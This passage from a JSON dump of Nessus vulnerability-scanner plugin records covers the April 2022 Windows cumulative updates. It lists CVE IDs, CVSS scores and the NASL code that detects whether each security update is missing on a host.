(C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012592'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'22000',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012592])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-19T17:40:44", "description": "The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24479, CVE-2022-24481, CVE-2022-24486, CVE-2022-24494, CVE-2022-24496, CVE-2022-24499, CVE-2022-24521, CVE-2022-24527, CVE-2022-24530, CVE-2022-24540, CVE-2022-24542, CVE-2022-24544, CVE-2022-24546, CVE-2022-24547, CVE-2022-24549, CVE-2022-24550, CVE-2022-26786, CVE-2022-26787, CVE-2022-26788, CVE-2022-26789, CVE-2022-26790, CVE-2022-26792, CVE-2022-26793, CVE-2022-26794, CVE-2022-26795, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803, CVE-2022-26807, CVE-2022-26808, CVE-2022-26810, CVE-2022-26827, CVE-2022-26828, CVE-2022-26904, CVE-2022-26914)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831, CVE-2022-26915)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21983, CVE-2022-22008, CVE-2022-24485, CVE-2022-24487, CVE-2022-24491, CVE-2022-24492, CVE-2022-24495, CVE-2022-24500, CVE-2022-24528, CVE-2022-24533, CVE-2022-24534, CVE-2022-24537, CVE-2022-24541, CVE-2022-24545, CVE-2022-26809, CVE-2022-26826, CVE-2022-26903, CVE-2022-26916, CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24483, CVE-2022-24493, CVE-2022-24498, CVE-2022-26920)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012591: Windows 10 version 1909 / Windows Server 1909 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24537", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26828", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012591.NASL", "href": "https://www.tenable.com/plugins/nessus/159679", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159679);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24537\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24546\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26789\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26793\",\n \"CVE-2022-26794\",\n \"CVE-2022-26795\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26826\",\n \"CVE-2022-26827\",\n \"CVE-2022-26828\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26914\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\",\n \"CVE-2022-26920\"\n );\n script_xref(name:\"MSKB\", value:\"5012591\");\n script_xref(name:\"MSFT\", value:\"MS22-5012591\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012591: Windows 10 version 1909 / Windows Server 1909 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24479, CVE-2022-24481,\n CVE-2022-24486, CVE-2022-24494, CVE-2022-24496,\n CVE-2022-24499, CVE-2022-24521, CVE-2022-24527,\n CVE-2022-24530, CVE-2022-24540, CVE-2022-24542,\n CVE-2022-24544, CVE-2022-24546, CVE-2022-24547,\n CVE-2022-24549, CVE-2022-24550, CVE-2022-26786,\n CVE-2022-26787, CVE-2022-26788, CVE-2022-26789,\n CVE-2022-26790, CVE-2022-26792, CVE-2022-26793,\n CVE-2022-26794, CVE-2022-26795, CVE-2022-26796,\n CVE-2022-26797, CVE-2022-26798, CVE-2022-26801,\n CVE-2022-26802, CVE-2022-26803, CVE-2022-26807,\n CVE-2022-26808, CVE-2022-26810, CVE-2022-26827,\n CVE-2022-26828, CVE-2022-26904, CVE-2022-26914)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831,\n CVE-2022-26915)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21983,\n CVE-2022-22008, CVE-2022-24485, CVE-2022-24487,\n CVE-2022-24491, CVE-2022-24492, CVE-2022-24495,\n CVE-2022-24500, CVE-2022-24528, CVE-2022-24533,\n CVE-2022-24534, CVE-2022-24537, CVE-2022-24541,\n CVE-2022-24545, CVE-2022-26809, CVE-2022-26826,\n CVE-2022-26903, CVE-2022-26916, CVE-2022-26917,\n CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24483, CVE-2022-24493,\n CVE-2022-24498, CVE-2022-26920)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012591\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012591\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012591'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012591])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-19T17:41:03", "description": "The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-26827, CVE-2022-24549, CVE-2022-26810, CVE-2022-26803, CVE-2022-26808, CVE-2022-26807, CVE-2022-26792, CVE-2022-26801, CVE-2022-26802, CVE-2022-26794, CVE-2022-26790, CVE-2022-26797, CVE-2022-26787, CVE-2022-26798, CVE-2022-26796, CVE-2022-26786, CVE-2022-26904, CVE-2022-26788, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24547, CVE-2022-24550, CVE-2022-24499, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831, CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26823, CVE-2022-26812, CVE-2022-26919, CVE-2022-26811, CVE-2022-26809, CVE-2022-26918, CVE-2022-26917, CVE-2022-26813, CVE-2022-26826, CVE-2022-26824, CVE-2022-26815, CVE-2022-26814, CVE-2022-26916, CVE-2022-26822, CVE-2022-26829, CVE-2022-26820, CVE-2022-26819, CVE-2022-26818, CVE-2022-26825, CVE-2022-26817, CVE-2022-26821, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-26816, CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012596: Windows 10 version 1607 / Windows Server 2016 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24489", "CVE-2022-24490", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24537", "CVE-2022-24538", "CVE-2022-24539", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26783", "CVE-2022-26784", "CVE-2022-26785", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26816", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012596.NASL", "href": "https://www.tenable.com/plugins/nessus/159677", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159677);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24489\",\n \"CVE-2022-24490\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24537\",\n \"CVE-2022-24538\",\n \"CVE-2022-24539\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26783\",\n \"CVE-2022-26784\",\n \"CVE-2022-26785\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26811\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26814\",\n \"CVE-2022-26815\",\n \"CVE-2022-26816\",\n \"CVE-2022-26817\",\n \"CVE-2022-26818\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26823\",\n \"CVE-2022-26824\",\n \"CVE-2022-26825\",\n \"CVE-2022-26826\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012596\");\n script_xref(name:\"MSFT\", value:\"MS22-5012596\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012596: Windows 10 version 1607 / Windows Server 2016 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-26827, CVE-2022-24549, CVE-2022-26810, \n CVE-2022-26803, CVE-2022-26808, CVE-2022-26807, \n CVE-2022-26792, CVE-2022-26801, CVE-2022-26802, \n CVE-2022-26794, CVE-2022-26790, CVE-2022-26797, \n CVE-2022-26787, CVE-2022-26798, CVE-2022-26796, \n CVE-2022-26786, CVE-2022-26904, CVE-2022-26788, \n CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, \n CVE-2022-24489, CVE-2022-24486, CVE-2022-24481, \n CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, \n CVE-2022-24521, CVE-2022-24547, CVE-2022-24550, \n CVE-2022-24499, CVE-2022-24494, CVE-2022-24542, \n CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831, \n CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, \n CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26823, \n CVE-2022-26812, CVE-2022-26919, CVE-2022-26811, \n CVE-2022-26809, CVE-2022-26918, CVE-2022-26917, \n CVE-2022-26813, CVE-2022-26826, CVE-2022-26824, \n CVE-2022-26815, CVE-2022-26814, CVE-2022-26916, \n CVE-2022-26822, CVE-2022-26829, CVE-2022-26820, \n CVE-2022-26819, CVE-2022-26818, CVE-2022-26825, \n CVE-2022-26817, CVE-2022-26821, CVE-2022-24545, \n CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, \n CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, \n CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, \n CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, \n CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-26816, CVE-2022-24493, \n CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, \n CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012596\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5012596\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012596'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012596])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-19T17:41:21", "description": "The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-26790, CVE-2022-26828, CVE-2022-26827, CVE-2022-26807, CVE-2022-26796, CVE-2022-26798, CVE-2022-26808, CVE-2022-26810, CVE-2022-26803, CVE-2022-26802, CVE-2022-26801, CVE-2022-26794, CVE-2022-26792, CVE-2022-26904, CVE-2022-26788, CVE-2022-26793, CVE-2022-26914, CVE-2022-26789, CVE-2022-26797, CVE-2022-26787, CVE-2022-24549, CVE-2022-26795, CVE-2022-26786, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831, CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26824, CVE-2022-26812, CVE-2022-26919, CVE-2022-26918, CVE-2022-26809, CVE-2022-26825, CVE-2022-26916, CVE-2022-26819, CVE-2022-26817, CVE-2022-26815, CVE-2022-26814, CVE-2022-26823, CVE-2022-26811, CVE-2022-26829, CVE-2022-26821, CVE-2022-26917, CVE-2022-26820, CVE-2022-26826, CVE-2022-26818, CVE-2022-26822, CVE-2022-26813, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-26920, CVE-2022-26816, CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-12T00:00:00", 